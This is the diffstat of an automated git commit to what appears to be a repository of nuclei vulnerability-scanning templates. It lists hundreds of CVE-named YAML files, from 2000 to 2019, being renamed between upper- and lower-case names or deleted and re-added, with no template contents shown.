From 08722bb55d40b45a07e3dbddd0f9ab052a66e8da Mon Sep 17 00:00:00 2001 
From: test Date: Fri, 9 Aug 2024 02:15:58 +0000 Subject: [PATCH] Auto Updated --- README.md | 152 +- data.json | 3 +- data1.json | 103 +- links.csv | 1 + nuclei-templates/CVE-2000/CVE-2000-0114.yaml | 32 + nuclei-templates/CVE-2000/cve-2000-0114.yaml | 32 - nuclei-templates/CVE-2006/CVE-2006-1681.yaml | 36 - nuclei-templates/CVE-2006/cve-2006-1681.yaml | 34 + ...{cve-2007-5728.yaml => CVE-2007-5728.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-2398.yaml | 38 - ...{cve-2008-2650.yaml => CVE-2008-2650.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-4668.yaml | 31 - nuclei-templates/CVE-2008/CVE-2008-6080.yaml | 31 - nuclei-templates/CVE-2008/cve-2008-2398.yaml | 35 + nuclei-templates/CVE-2008/cve-2008-4668.yaml | 31 + nuclei-templates/CVE-2008/cve-2008-6080.yaml | 31 + nuclei-templates/CVE-2009/CVE-2009-0545.yaml | 7 +- ...{cve-2009-0932.yaml => CVE-2009-0932.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-1496.yaml | 31 - nuclei-templates/CVE-2009/CVE-2009-1558.yaml | 30 - nuclei-templates/CVE-2009/CVE-2009-2100.yaml | 31 - nuclei-templates/CVE-2009/CVE-2009-3053.yaml | 31 - ...{cve-2009-3318.yaml => CVE-2009-3318.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-4202.yaml | 33 - nuclei-templates/CVE-2009/CVE-2009-4223.yaml | 28 + nuclei-templates/CVE-2009/CVE-2009-4679.yaml | 34 - nuclei-templates/CVE-2009/cve-2009-1496.yaml | 30 + nuclei-templates/CVE-2009/cve-2009-1558.yaml | 30 + nuclei-templates/CVE-2009/cve-2009-2100.yaml | 31 + nuclei-templates/CVE-2009/cve-2009-3053.yaml | 31 + nuclei-templates/CVE-2009/cve-2009-4202.yaml | 31 + nuclei-templates/CVE-2009/cve-2009-4223.yaml | 30 - nuclei-templates/CVE-2009/cve-2009-4679.yaml | 31 + nuclei-templates/CVE-2010/CVE-2010-0219.yaml | 49 - nuclei-templates/CVE-2010/CVE-2010-0696.yaml | 27 - nuclei-templates/CVE-2010/CVE-2010-0944.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-0972.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-0982.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-0985.yaml | 30 - 
nuclei-templates/CVE-2010/CVE-2010-1217.yaml | 30 - ...{cve-2010-1305.yaml => CVE-2010-1305.yaml} | 0 ...{cve-2010-1306.yaml => CVE-2010-1306.yaml} | 0 ...{cve-2010-1307.yaml => CVE-2010-1307.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1313.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1469.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1470.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1473.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1475.yaml | 28 - ...{cve-2010-1476.yaml => CVE-2010-1476.yaml} | 0 ...{cve-2010-1491.yaml => CVE-2010-1491.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1531.yaml | 29 - nuclei-templates/CVE-2010/CVE-2010-1532.yaml | 30 - ...{cve-2010-1534.yaml => CVE-2010-1534.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1540.yaml | 30 - ...{cve-2010-1601.yaml => CVE-2010-1601.yaml} | 0 ...{cve-2010-1602.yaml => CVE-2010-1602.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1653.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-1714.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1715.yaml | 30 - ...{cve-2010-1717.yaml => CVE-2010-1717.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1718.yaml | 30 - ...{cve-2010-1719.yaml => CVE-2010-1719.yaml} | 0 ...{cve-2010-1722.yaml => CVE-2010-1722.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1871.yaml | 23 - ...{cve-2010-1878.yaml => CVE-2010-1878.yaml} | 0 ...{cve-2010-1952.yaml => CVE-2010-1952.yaml} | 0 ...{cve-2010-1953.yaml => CVE-2010-1953.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1954.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-1957.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-1979.yaml | 32 - ...{cve-2010-1983.yaml => CVE-2010-1983.yaml} | 0 ...{cve-2010-2033.yaml => CVE-2010-2033.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2035.yaml | 34 - ...{cve-2010-2050.yaml => CVE-2010-2050.yaml} | 0 ...{cve-2010-2128.yaml => CVE-2010-2128.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2259.yaml | 32 - ...{cve-2010-2307.yaml => CVE-2010-2307.yaml} | 0 ...{cve-2010-2861.yaml => CVE-2010-2861.yaml} | 0 
...{cve-2010-2918.yaml => CVE-2010-2918.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2920.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-3426.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-4239.yaml | 31 + ...{cve-2010-4617.yaml => CVE-2010-4617.yaml} | 0 ...{cve-2010-4769.yaml => CVE-2010-4769.yaml} | 0 ...{cve-2010-5028.yaml => CVE-2010-5028.yaml} | 0 ...{cve-2010-5278.yaml => CVE-2010-5278.yaml} | 0 ...{cve-2010-5286.yaml => CVE-2010-5286.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-0219.yaml | 53 + nuclei-templates/CVE-2010/cve-2010-0696.yaml | 31 + nuclei-templates/CVE-2010/cve-2010-0944.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-0972.yaml | 29 + nuclei-templates/CVE-2010/cve-2010-0982.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-0985.yaml | 30 + ...{CVE-2010-1056.yaml => cve-2010-1056.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1217.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1313.yaml | 29 + ...{CVE-2010-1314.yaml => cve-2010-1314.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1469.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1470.yaml | 29 + nuclei-templates/CVE-2010/cve-2010-1473.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1475.yaml | 29 + ...{CVE-2010-1495.yaml => cve-2010-1495.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1531.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1532.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1540.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1653.yaml | 30 + ...{CVE-2010-1658.yaml => cve-2010-1658.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1714.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1715.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1718.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1871.yaml | 24 + nuclei-templates/CVE-2010/cve-2010-1954.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1957.yaml | 33 + nuclei-templates/CVE-2010/cve-2010-1979.yaml | 33 + nuclei-templates/CVE-2010/cve-2010-2035.yaml | 34 + ...{CVE-2010-2045.yaml => cve-2010-2045.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-2259.yaml 
| 34 + nuclei-templates/CVE-2010/cve-2010-2920.yaml | 33 + nuclei-templates/CVE-2010/cve-2010-3426.yaml | 34 + nuclei-templates/CVE-2010/cve-2010-4239.yaml | 34 - ...{cve-2011-1669.yaml => CVE-2011-1669.yaml} | 0 ...{cve-2011-2780.yaml => CVE-2011-2780.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-4336.yaml | 41 - ...{cve-2011-4624.yaml => CVE-2011-4624.yaml} | 0 nuclei-templates/CVE-2011/cve-2011-4336.yaml | 41 + ...{CVE-2011-5106.yaml => cve-2011-5106.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-0392.yaml | 34 - nuclei-templates/CVE-2012/CVE-2012-0896.yaml | 31 - ...{cve-2012-1823.yaml => CVE-2012-1823.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-1835.yaml | 42 - ...{cve-2012-2371.yaml => CVE-2012-2371.yaml} | 0 ...{cve-2012-3153.yaml => CVE-2012-3153.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-4253.yaml | 31 - nuclei-templates/CVE-2012/CVE-2012-4547.yaml | 40 - ...{cve-2012-4889.yaml => CVE-2012-4889.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-0392.yaml | 34 + nuclei-templates/CVE-2012/cve-2012-0896.yaml | 33 + ...{CVE-2012-0901.yaml => cve-2012-0901.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-1835.yaml | 42 + nuclei-templates/CVE-2012/cve-2012-4253.yaml | 33 + ...{CVE-2012-4273.yaml => cve-2012-4273.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-4547.yaml | 40 + ...{cve-2013-2251.yaml => CVE-2013-2251.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-2287.yaml | 37 - nuclei-templates/CVE-2013/CVE-2013-3526.yaml | 37 - nuclei-templates/CVE-2013/CVE-2013-6281.yaml | 41 + ...{cve-2013-7240.yaml => CVE-2013-7240.yaml} | 0 nuclei-templates/CVE-2013/cve-2013-2287.yaml | 37 + nuclei-templates/CVE-2013/cve-2013-3526.yaml | 38 + nuclei-templates/CVE-2013/cve-2013-6281.yaml | 49 - nuclei-templates/CVE-2014/CVE-2014-1203.yaml | 35 - nuclei-templates/CVE-2014/CVE-2014-2321.yaml | 29 + nuclei-templates/CVE-2014/CVE-2014-2323.yaml | 31 - nuclei-templates/CVE-2014/CVE-2014-2383.yaml | 38 - nuclei-templates/CVE-2014/CVE-2014-2962.yaml | 32 - 
nuclei-templates/CVE-2014/CVE-2014-3120.yaml | 55 - nuclei-templates/CVE-2014/CVE-2014-3206.yaml | 38 - ...{cve-2014-3704.yaml => CVE-2014-3704.yaml} | 0 ...{cve-2014-4210.yaml => CVE-2014-4210.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4535.yaml | 39 - ...{cve-2014-4539.yaml => CVE-2014-4539.yaml} | 0 ...{cve-2014-4544.yaml => CVE-2014-4544.yaml} | 0 ...{cve-2014-4550.yaml => CVE-2014-4550.yaml} | 0 ...{cve-2014-4592.yaml => CVE-2014-4592.yaml} | 0 ...{cve-2014-4940.yaml => CVE-2014-4940.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4942.yaml | 34 + ...{cve-2014-5258.yaml => CVE-2014-5258.yaml} | 0 ...{cve-2014-5368.yaml => CVE-2014-5368.yaml} | 0 ...{cve-2014-6271.yaml => CVE-2014-6271.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-8799.yaml | 36 - ...{cve-2014-9444.yaml => CVE-2014-9444.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-9608.yaml | 39 - nuclei-templates/CVE-2014/cve-2014-1203.yaml | 39 + nuclei-templates/CVE-2014/cve-2014-2321.yaml | 36 - nuclei-templates/CVE-2014/cve-2014-2323.yaml | 32 + nuclei-templates/CVE-2014/cve-2014-2383.yaml | 42 + nuclei-templates/CVE-2014/cve-2014-2962.yaml | 34 + nuclei-templates/CVE-2014/cve-2014-3120.yaml | 60 + nuclei-templates/CVE-2014/cve-2014-3206.yaml | 38 + nuclei-templates/CVE-2014/cve-2014-4535.yaml | 40 + nuclei-templates/CVE-2014/cve-2014-4942.yaml | 45 - ...{CVE-2014-8682.yaml => cve-2014-8682.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-8799.yaml | 37 + nuclei-templates/CVE-2014/cve-2014-9608.yaml | 40 + ...{cve-2015-0554.yaml => CVE-2015-0554.yaml} | 0 .../CVE-2015/CVE-2015-1000012.yaml | 36 - ...{cve-2015-1880.yaml => CVE-2015-1880.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-2067.yaml | 34 - ...{cve-2015-2068.yaml => CVE-2015-2068.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-3224.yaml | 38 - nuclei-templates/CVE-2015/CVE-2015-3337.yaml | 34 - ...{cve-2015-3897.yaml => CVE-2015-3897.yaml} | 0 ...{cve-2015-4414.yaml => CVE-2015-4414.yaml} | 0 ...{cve-2015-5461.yaml => CVE-2015-5461.yaml} | 0 
nuclei-templates/CVE-2015/CVE-2015-5471.yaml | 23 - nuclei-templates/CVE-2015/CVE-2015-6544.yaml | 42 - nuclei-templates/CVE-2015/CVE-2015-7377.yaml | 34 - nuclei-templates/CVE-2015/CVE-2015-7450.yaml | 61 - nuclei-templates/CVE-2015/CVE-2015-7823.yaml | 27 - ...{cve-2015-8349.yaml => CVE-2015-8349.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-8399.yaml | 40 - ...{cve-2015-8813.yaml => CVE-2015-8813.yaml} | 0 ...{cve-2015-9414.yaml => CVE-2015-9414.yaml} | 0 .../CVE-2015/cve-2015-1000012.yaml | 33 + nuclei-templates/CVE-2015/cve-2015-2067.yaml | 30 + nuclei-templates/CVE-2015/cve-2015-3224.yaml | 43 + nuclei-templates/CVE-2015/cve-2015-3337.yaml | 31 + nuclei-templates/CVE-2015/cve-2015-5471.yaml | 37 + nuclei-templates/CVE-2015/cve-2015-6544.yaml | 40 + nuclei-templates/CVE-2015/cve-2015-7377.yaml | 36 + nuclei-templates/CVE-2015/cve-2015-7450.yaml | 59 + nuclei-templates/CVE-2015/cve-2015-7823.yaml | 25 + nuclei-templates/CVE-2015/cve-2015-8399.yaml | 37 + ...{CVE-2015-9480.yaml => cve-2015-9480.yaml} | 0 ...{cve-2016-0957.yaml => CVE-2016-0957.yaml} | 0 ...016-1000128.yaml => CVE-2016-1000128.yaml} | 0 .../CVE-2016/CVE-2016-1000131.yaml | 39 - .../CVE-2016/CVE-2016-1000133.yaml | 39 - ...016-1000138.yaml => CVE-2016-1000138.yaml} | 0 ...016-1000139.yaml => CVE-2016-1000139.yaml} | 0 ...016-1000140.yaml => CVE-2016-1000140.yaml} | 0 ...016-1000142.yaml => CVE-2016-1000142.yaml} | 0 .../CVE-2016/CVE-2016-1000143.yaml | 37 - .../CVE-2016/CVE-2016-1000149.yaml | 39 - .../CVE-2016/CVE-2016-1000152.yaml | 39 - .../CVE-2016/CVE-2016-1000154.yaml | 39 - nuclei-templates/CVE-2016/CVE-2016-10033.yaml | 56 - ...ve-2016-10924.yaml => CVE-2016-10924.yaml} | 0 ...ve-2016-10960.yaml => CVE-2016-10960.yaml} | 0 ...{cve-2016-2389.yaml => CVE-2016-2389.yaml} | 0 ...{cve-2016-3081.yaml => CVE-2016-3081.yaml} | 0 ...{cve-2016-3978.yaml => CVE-2016-3978.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-4977.yaml | 37 - nuclei-templates/CVE-2016/CVE-2016-6210.yaml | 29 + 
...{cve-2016-7552.yaml => CVE-2016-7552.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-8527.yaml | 42 - .../CVE-2016/cve-2016-1000131.yaml | 39 + .../CVE-2016/cve-2016-1000133.yaml | 39 + .../CVE-2016/cve-2016-1000143.yaml | 38 + .../CVE-2016/cve-2016-1000149.yaml | 39 + .../CVE-2016/cve-2016-1000152.yaml | 39 + .../CVE-2016/cve-2016-1000154.yaml | 39 + nuclei-templates/CVE-2016/cve-2016-10033.yaml | 56 + nuclei-templates/CVE-2016/cve-2016-4977.yaml | 37 + nuclei-templates/CVE-2016/cve-2016-6210.yaml | 33 - nuclei-templates/CVE-2016/cve-2016-8527.yaml | 40 + .../CVE-2017/CVE-2017-1000028.yaml | 44 - nuclei-templates/CVE-2017/CVE-2017-10271.yaml | 99 - ...ve-2017-10974.yaml => CVE-2017-10974.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-11610.yaml | 58 - ...ve-2017-12149.yaml => CVE-2017-12149.yaml} | 0 ...ve-2017-12544.yaml => CVE-2017-12544.yaml} | 0 ...ve-2017-12611.yaml => CVE-2017-12611.yaml} | 0 ...ve-2017-12615.yaml => CVE-2017-12615.yaml} | 0 ...ve-2017-12629.yaml => CVE-2017-12629.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-12794.yaml | 42 - nuclei-templates/CVE-2017/CVE-2017-14535.yaml | 42 - ...ve-2017-14651.yaml => CVE-2017-14651.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-15287.yaml | 32 - ...ve-2017-15363.yaml => CVE-2017-15363.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-15647.yaml | 36 - ...ve-2017-16806.yaml => CVE-2017-16806.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-17451.yaml | 35 - ...{cve-2017-3528.yaml => CVE-2017-3528.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-4011.yaml | 38 - ...{cve-2017-5638.yaml => CVE-2017-5638.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-6090.yaml | 51 - nuclei-templates/CVE-2017/CVE-2017-7615.yaml | 43 - nuclei-templates/CVE-2017/CVE-2017-8917.yaml | 37 - ...{cve-2017-9288.yaml => CVE-2017-9288.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-9791.yaml | 45 - nuclei-templates/CVE-2017/CVE-2017-9833.yaml | 35 - nuclei-templates/CVE-2017/CVE-2017-9841.yaml | 77 - .../CVE-2017/cve-2017-1000028.yaml | 41 + 
nuclei-templates/CVE-2017/cve-2017-10271.yaml | 96 + nuclei-templates/CVE-2017/cve-2017-11610.yaml | 56 + nuclei-templates/CVE-2017/cve-2017-12794.yaml | 42 + nuclei-templates/CVE-2017/cve-2017-14535.yaml | 42 + nuclei-templates/CVE-2017/cve-2017-15287.yaml | 32 + nuclei-templates/CVE-2017/cve-2017-15647.yaml | 33 + nuclei-templates/CVE-2017/cve-2017-17451.yaml | 39 + ...VE-2017-18536.yaml => cve-2017-18536.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-4011.yaml | 36 + ...{CVE-2017-5487.yaml => cve-2017-5487.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-6090.yaml | 49 + nuclei-templates/CVE-2017/cve-2017-7615.yaml | 44 + nuclei-templates/CVE-2017/cve-2017-8917.yaml | 32 + nuclei-templates/CVE-2017/cve-2017-9791.yaml | 45 + nuclei-templates/CVE-2017/cve-2017-9833.yaml | 35 + nuclei-templates/CVE-2017/cve-2017-9841.yaml | 77 + .../CVE-2018/CVE-2018-1000856.yaml | 52 - .../CVE-2018/CVE-2018-1000861.yaml | 37 - ...ve-2018-10201.yaml => CVE-2018-10201.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10230.yaml | 36 + ...ve-2018-10818.yaml => CVE-2018-10818.yaml} | 0 ...ve-2018-10823.yaml => CVE-2018-10823.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10956.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-11231.yaml | 38 + ...ve-2018-11510.yaml => CVE-2018-11510.yaml} | 0 ...ve-2018-11709.yaml => CVE-2018-11709.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-11776.yaml | 37 - nuclei-templates/CVE-2018/CVE-2018-11784.yaml | 20 - ...ve-2018-12031.yaml => CVE-2018-12031.yaml} | 0 ...ve-2018-12054.yaml => CVE-2018-12054.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-12300.yaml | 28 - nuclei-templates/CVE-2018/CVE-2018-12613.yaml | 38 - nuclei-templates/CVE-2018/CVE-2018-1271.yaml | 30 - nuclei-templates/CVE-2018/CVE-2018-13379.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-13980.yaml | 36 - ...ve-2018-14064.yaml => CVE-2018-14064.yaml} | 0 ...ve-2018-14574.yaml => CVE-2018-14574.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-14916.yaml | 31 - ...ve-2018-14918.yaml => CVE-2018-14918.yaml} | 
0 nuclei-templates/CVE-2018/CVE-2018-15473.yaml | 29 + nuclei-templates/CVE-2018/CVE-2018-15657.yaml | 28 + ...ve-2018-15745.yaml => CVE-2018-15745.yaml} | 0 ...ve-2018-15961.yaml => CVE-2018-15961.yaml} | 0 ...ve-2018-16059.yaml => CVE-2018-16059.yaml} | 0 ...ve-2018-16133.yaml => CVE-2018-16133.yaml} | 0 ...ve-2018-16167.yaml => CVE-2018-16167.yaml} | 0 ...ve-2018-16288.yaml => CVE-2018-16288.yaml} | 0 ...ve-2018-16299.yaml => CVE-2018-16299.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16341.yaml | 26 - nuclei-templates/CVE-2018/CVE-2018-16671.yaml | 30 - ...ve-2018-17422.yaml => CVE-2018-17422.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-18069.yaml | 37 - nuclei-templates/CVE-2018/CVE-2018-18608.yaml | 39 - nuclei-templates/CVE-2018/CVE-2018-18775.yaml | 30 - nuclei-templates/CVE-2018/CVE-2018-18777.yaml | 24 - nuclei-templates/CVE-2018/CVE-2018-18778.yaml | 30 - ...ve-2018-18925.yaml => CVE-2018-18925.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19137.yaml | 43 - ...ve-2018-19326.yaml => CVE-2018-19326.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19365.yaml | 31 - ...ve-2018-19458.yaml => CVE-2018-19458.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19751.yaml | 52 + nuclei-templates/CVE-2018/CVE-2018-19753.yaml | 31 - nuclei-templates/CVE-2018/CVE-2018-19914.yaml | 46 + nuclei-templates/CVE-2018/CVE-2018-20009.yaml | 47 + nuclei-templates/CVE-2018/CVE-2018-20011.yaml | 47 + ...{cve-2018-2893.yaml => CVE-2018-2893.yaml} | 0 ...{cve-2018-2894.yaml => CVE-2018-2894.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-5230.yaml | 7 +- ...{cve-2018-5233.yaml => CVE-2018-5233.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-6200.yaml | 28 - nuclei-templates/CVE-2018/CVE-2018-6910.yaml | 39 - nuclei-templates/CVE-2018/CVE-2018-7422.yaml | 41 - ...{cve-2018-7602.yaml => CVE-2018-7602.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-7662.yaml | 37 + nuclei-templates/CVE-2018/CVE-2018-7700.yaml | 36 - nuclei-templates/CVE-2018/CVE-2018-7719.yaml | 32 - 
nuclei-templates/CVE-2018/CVE-2018-8033.yaml | 41 - nuclei-templates/CVE-2018/CVE-2018-8719.yaml | 36 - ...{cve-2018-9118.yaml => CVE-2018-9118.yaml} | 0 ...018-1000226.yaml => cve-2018-1000226.yaml} | 0 .../CVE-2018/cve-2018-1000856.yaml | 61 + .../CVE-2018/cve-2018-1000861.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-10230.yaml | 43 - nuclei-templates/CVE-2018/cve-2018-10956.yaml | 35 + nuclei-templates/CVE-2018/cve-2018-11231.yaml | 44 - nuclei-templates/CVE-2018/cve-2018-11776.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-11784.yaml | 30 + nuclei-templates/CVE-2018/cve-2018-12300.yaml | 28 + nuclei-templates/CVE-2018/cve-2018-12613.yaml | 35 + nuclei-templates/CVE-2018/cve-2018-1271.yaml | 28 + nuclei-templates/CVE-2018/cve-2018-13379.yaml | 28 + nuclei-templates/CVE-2018/cve-2018-13980.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-14916.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-15473.yaml | 29 - nuclei-templates/CVE-2018/cve-2018-15657.yaml | 30 - nuclei-templates/CVE-2018/cve-2018-16341.yaml | 20 + nuclei-templates/CVE-2018/cve-2018-16671.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-18069.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-18608.yaml | 46 + nuclei-templates/CVE-2018/cve-2018-18775.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-18777.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-18778.yaml | 31 + nuclei-templates/CVE-2018/cve-2018-19137.yaml | 51 + nuclei-templates/CVE-2018/cve-2018-19365.yaml | 35 + nuclei-templates/CVE-2018/cve-2018-19751.yaml | 62 - nuclei-templates/CVE-2018/cve-2018-19753.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-19914.yaml | 54 - nuclei-templates/CVE-2018/cve-2018-20009.yaml | 54 - nuclei-templates/CVE-2018/cve-2018-20011.yaml | 54 - ...{CVE-2018-6008.yaml => cve-2018-6008.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-6200.yaml | 37 + ...{CVE-2018-6389.yaml => cve-2018-6389.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-6910.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-7422.yaml | 38 + ...{CVE-2018-7467.yaml => 
cve-2018-7467.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-7662.yaml | 41 - nuclei-templates/CVE-2018/cve-2018-7700.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-7719.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-8033.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-8719.yaml | 36 + nuclei-templates/CVE-2019/CVE-2019-0221.yaml | 46 - ...ve-2019-10232.yaml => CVE-2019-10232.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-10475.yaml | 39 - nuclei-templates/CVE-2019/CVE-2019-10717.yaml | 38 + nuclei-templates/CVE-2019/CVE-2019-10758.yaml | 36 - nuclei-templates/CVE-2019/CVE-2019-11013.yaml | 24 - nuclei-templates/CVE-2019/CVE-2019-11043.yaml | 17 - ...ve-2019-11248.yaml => CVE-2019-11248.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-11370.yaml | 39 + ...ve-2019-11580.yaml => CVE-2019-11580.yaml} | 0 ...ve-2019-12725.yaml => CVE-2019-12725.yaml} | 0 ...ve-2019-13392.yaml => CVE-2019-13392.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-13396.yaml | 37 - ...ve-2019-13462.yaml => CVE-2019-13462.yaml} | 0 ...ve-2019-14223.yaml => CVE-2019-14223.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14251.yaml | 31 - ...ve-2019-14312.yaml => CVE-2019-14312.yaml} | 0 ...ve-2019-14470.yaml => CVE-2019-14470.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14696.yaml | 42 - ...ve-2019-14974.yaml => CVE-2019-14974.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15107.yaml | 37 - nuclei-templates/CVE-2019/CVE-2019-15811.yaml | 42 - ...ve-2019-16278.yaml => CVE-2019-16278.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-1653.yaml | 39 - ...ve-2019-16759.yaml => CVE-2019-16759.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16932.yaml | 41 - nuclei-templates/CVE-2019/CVE-2019-16996.yaml | 32 - ...ve-2019-17538.yaml => CVE-2019-17538.yaml} | 0 ...ve-2019-17558.yaml => CVE-2019-17558.yaml} | 0 ...ve-2019-18393.yaml => CVE-2019-18393.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-18665.yaml | 30 + ...ve-2019-18818.yaml => CVE-2019-18818.yaml} | 0 ...ve-2019-19908.yaml => CVE-2019-19908.yaml} | 0 
nuclei-templates/CVE-2019/CVE-2019-19985.yaml | 43 - ...ve-2019-20085.yaml => CVE-2019-20085.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-20210.yaml | 37 + nuclei-templates/CVE-2019/CVE-2019-20354.yaml | 18 - nuclei-templates/CVE-2019/CVE-2019-20933.yaml | 32 + nuclei-templates/CVE-2019/CVE-2019-2616.yaml | 29 - ...{cve-2019-2767.yaml => CVE-2019-2767.yaml} | 0 ...{cve-2019-3396.yaml => CVE-2019-3396.yaml} | 0 ...{cve-2019-3799.yaml => CVE-2019-3799.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-3912.yaml | 28 - ...{cve-2019-7219.yaml => CVE-2019-7219.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-7254.yaml | 25 - nuclei-templates/CVE-2019/CVE-2019-7315.yaml | 29 - nuclei-templates/CVE-2019/CVE-2019-7609.yaml | 45 - nuclei-templates/CVE-2019/CVE-2019-8442.yaml | 28 - ...{cve-2019-8449.yaml => CVE-2019-8449.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-8451.yaml | 38 - ...{cve-2019-8903.yaml => CVE-2019-8903.yaml} | 0 ...{cve-2019-8937.yaml => CVE-2019-8937.yaml} | 0 ...{cve-2019-8982.yaml => CVE-2019-8982.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9041.yaml | 39 - nuclei-templates/CVE-2019/CVE-2019-9082.yaml | 1 - ...{cve-2019-9726.yaml => CVE-2019-9726.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9915.yaml | 32 + nuclei-templates/CVE-2019/CVE-2019-9922.yaml | 28 + nuclei-templates/CVE-2019/cve-2019-0221.yaml | 44 + nuclei-templates/CVE-2019/cve-2019-10475.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-10717.yaml | 43 - nuclei-templates/CVE-2019/cve-2019-10758.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-11013.yaml | 34 + 